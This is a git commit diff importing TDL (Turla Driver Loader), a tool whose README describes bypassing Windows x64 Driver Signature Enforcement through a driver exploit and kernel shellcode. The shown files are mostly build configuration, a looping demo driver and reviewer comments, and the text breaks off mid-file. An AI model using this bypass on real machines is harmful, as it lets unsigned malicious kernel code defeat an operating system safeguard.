Initial commit
This commit is contained in:
hfiref0x 2016-02-04 11:42:05 +07:00
parent c26b317ca2
commit 20a4e9b210
49 changed files with 9438 additions and 0 deletions

Compiled/Furutaka.exe Normal file


Compiled/dummy.sys Normal file


Compiled/dummy2.sys Normal file


40
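--- a/README.md
+++ b/README.md
@@ -0,0 +1,40 @@
+# TDL (Turla Driver Loader)
+## Driver loader for bypassing Windows x64 Driver Signature Enforcement
+For more info see
++ Defeating x64 Driver Signature Enforcement http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322
++ WinNT/Turla http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193
+# System Requirements and limitations
++ x64 Windows 7/8/8.1/10.
++ TDL designed only for x64 Windows, Vista not listed as supported because it is obsolete.
++ Administrative privilege is required.
++ Loaded drivers MUST BE specially designed to run as "driverless".
++ No SEH support for target drivers.
++ No driver unloading.
++ Only ntoskrnl import resolved, everything else is up to you.
++ Dummy driver examples provided.
+You use it at your own risk. Some lazy AV may flag this loader as malware.
+# Differences between DSEFix and TDL
+While both DSEFix and TDL uses advantage of driver exploit they completely different on way of it use.
++ DSEFix manipulate kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL). Main advantage of DSEFix is it simplicity - you turn DSE off - load your driver (or patched one) and nothing else required. Main disadvantage of DSEFix is that on the modern version of Windows (8+) g_CiOptions variable is subject of PatchGuard (KPP) protection, which mean DSEFix is a potential BSOD-generator.
++ TDL does not patch any kernel variables, which makes it friendly to PatchGuard. It uses small shellcode which maps your driver to kernel mode without involving Windows loader (and as result without triggering any parts of DSE) and executes it. This is main advantage of TDL - non invasive bypass of DSE. There are many disadvantages however - the first and main -> your driver MUST BE specially created to run as "driverless" which mean you will be unable to load *any* driver but only specially designed. Your driver will exist in kernel mode as executable code buffer, it won't be linked to PsLoadedModuleList, there will be other limitations. However this code will work at kernel mode and user mode application will be able communicate with it. You can load multiple drivers, of course if they are not conflict with each other.
+# Build
+TDL comes with full source code.
+In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above.
+# Authors
+(c) 2016 TDL Project
+# Credits
++ R136a1
++ N. Rin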
20
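--- a/Source/DummyDrv/dummy.sln
+++ b/Source/DummyDrv/dummy.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Release|x64 = Release|x64
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
+{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
+{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+EndGlobal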

@ -0,0 +1,239 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
<TemplateGuid>{1bc93793-694f-48fe-9372-81e2b05556fd}</TemplateGuid>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
<Configuration>Debug</Configuration>
<Platform Condition="'$(Platform)' == ''">Win32</Platform>
<RootNamespace>dummy</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver8.1</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Speed</FavorSizeOrSpeed>
<BufferSecurityCheck>false</BufferSecurityCheck>
<ExpandAttributedSource>true</ExpandAttributedSource>
<AssemblerOutput>All</AssemblerOutput>
<BrowseInformation>true</BrowseInformation>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
<Link>
<SuppressStartupBanner>false</SuppressStartupBanner>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapExports>true</MapExports>
<LargeAddressAware>true</LargeAddressAware>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<RandomizedBaseAddress>true</RandomizedBaseAddress>
<DataExecutionPrevention>true</DataExecutionPrevention>
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemGroup>
<FilesToPackage Include="$(TargetPath)" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
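Review bot: `<BufferSecurityCheck>false</BufferSecurityCheck>` in the Release|x64 ClCompile group turns off /GS stack cookies for a kernel-mode image, and nothing in the project says why. The choice looks deliberate rather than accidental: the Link group sets `<EntryPointSymbol>DriverEntry</EntryPointSymbol>`, which bypasses the WDK's default GsDriverEntry stub that seeds the security cookie before calling DriverEntry, so a /GS-enabled build entered directly at DriverEntry would presumably run with an uninitialised cookie — I have not verified this against the 8.1 toolset's libraries. A one-line comment beside the setting, `<!-- /GS off: image is entered at DriverEntry directly (no GsDriverEntry to initialise __security_cookie) and mapped without the loader -->`, would stop a later maintainer from "fixing" it. Separately, Release|x64 is the only configuration dummy.sln builds, yet it alone selects `WindowsKernelModeDriver8.1` while every other configuration selects 10.0; if the 8.1 toolset is a hard requirement of the shellcode mapper rather than a leftover, that too deserves a comment.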


@ -0,0 +1,26 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Driver Files">
<UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
<Extensions>inf;inv;inx;mof;mc;</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>


@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<SignMode>Off</SignMode>
</PropertyGroup>
</Project>


@ -0,0 +1,63 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include <ntddk.h>
DRIVER_INITIALIZE DriverEntry;
#pragma alloc_text(INIT, DriverEntry)
/*
* DriverEntry
*
* Purpose:
*
* Driver base entry point.
*
*/
NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
LARGE_INTEGER tm;
PEPROCESS Process;
tm.QuadPart = -10000000;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess();
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
__FUNCTION__,
(ULONG)PsGetCurrentProcessId(),
Process
);
} while (1);
return STATUS_SUCCESS;
}
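Review bot: DriverEntry never returns — the `do { ... } while (1);` loop has no exit, so `return STATUS_SUCCESS;` is dead code and the kernel thread that jumped into the mapped image stays parked in KeDelayExecutionThread for the life of the system. If that is the intended demonstration (the repository's "No driver unloading" limitation suggests it is), say so at the loop, e.g. `/* Intentionally never returns: a driverless image has no unload path, and the thread that entered us is consumed until reboot. */`, because nothing in the file states it. `#pragma alloc_text(INIT, DriverEntry)` is misleading in the same way: under the normal loader INIT is discarded after DriverEntry returns, but this image is mapped without the loader and DriverEntry does not return, so the pragma buys nothing here and invites a reader to assume loader semantics that do not apply — I would drop it or comment why it is kept. The comment on the parameters says they are "invalid" but not what they hold; a sentence stating what TDL actually passes for DriverObject and RegistryPath (or that both must be treated as garbage) would help anyone cloning this template, since the `(ULONG)PsGetCurrentProcessId()` / `PsGetCurrentProcess()` output will likewise depend on whichever process context the loader happened to run in.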


@ -0,0 +1,20 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,242 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
<TemplateGuid>{1bc93793-694f-48fe-9372-81e2b05556fd}</TemplateGuid>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
<Configuration>Debug</Configuration>
<Platform Condition="'$(Platform)' == ''">Win32</Platform>
<RootNamespace>dummy</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver8.1</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Speed</FavorSizeOrSpeed>
<BufferSecurityCheck>false</BufferSecurityCheck>
<ExpandAttributedSource>true</ExpandAttributedSource>
<AssemblerOutput>All</AssemblerOutput>
<BrowseInformation>true</BrowseInformation>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>false</EnablePREfast>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
<Link>
<SuppressStartupBanner>false</SuppressStartupBanner>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapExports>true</MapExports>
